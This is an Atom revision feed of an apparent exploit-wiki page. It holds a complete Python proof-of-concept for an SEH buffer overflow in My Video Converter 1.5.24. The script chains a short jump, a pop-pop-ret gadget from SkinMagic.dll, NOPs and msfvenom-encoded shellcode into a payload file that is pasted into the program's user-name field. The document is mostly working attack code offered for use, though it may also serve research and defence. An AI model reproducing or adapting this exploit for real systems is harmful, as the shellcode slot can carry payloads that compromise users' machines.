https://pwnwiki.com/index.php?action=history&feed=atom&title=My_Video_Converter_1.5.24_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
My Video Converter 1.5.24 緩衝區溢出漏洞 - Revision history
2026-04-21T05:36:16Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=My_Video_Converter_1.5.24_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=1515&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/env python # Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow # Discovery by : Shubham Singh # Known As : Spiri..."
2021-04-11T01:28:51Z
<p>Created page with "==EXP== <pre> #!/usr/bin/env python # Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow # Discovery by : Shubham Singh # Known As : Spiri..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
#!/usr/bin/env python<br />
<br />
# Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow <br />
# Discovery by : Shubham Singh<br />
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]<br />
# Email : spiritedwolf@protonmail.com<br />
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit <br />
# Discovey Date : 29/07/2018<br />
# Software Link : http://www.divxtodvd.net/my_video_converter.exe<br />
# Tested Version : 1.5.24<br />
# Tested on OS : Windows XP Service Pack 3 x86<br />
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".<br />
# Just copy the text inside "exploit.txt" and start the My Video Converter 1.5.24 program and click on "Register".<br />
# In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator poped up.<br />
# Greetz : @FuzzySec @LiveOverflow @hexachordanu<br />
<br />
buffer = "\x41" * 996<br />
#Short Jump address<br />
nseh = "\xeb\x10\x90\x90" <br />
#0x1002434b : pop ebp # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\My Video Converter\SkinMagic.dll)<br />
seh= "\x4B\x43\x02\x10" <br />
nops = "\x90" * 16<br />
<br />
#badchar \x00\x0a\x0d<br />
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python<br />
buf = ""<br />
buf += "\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33"<br />
buf += "\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51"<br />
buf += "\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f"<br />
buf += "\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc"<br />
buf += "\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f"<br />
buf += "\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4"<br />
buf += "\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d"<br />
buf += "\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8"<br />
buf += "\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a"<br />
buf += "\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12"<br />
buf += "\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20"<br />
buf += "\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35"<br />
buf += "\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5"<br />
buf += "\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68"<br />
buf += "\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6"<br />
buf += "\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28"<br />
buf += "\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba"<br />
exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))<br />
f = open ("exploit.txt", "w")<br />
f.write(exploit)<br />
f.close()<br />
</pre></div>
Pwnwiki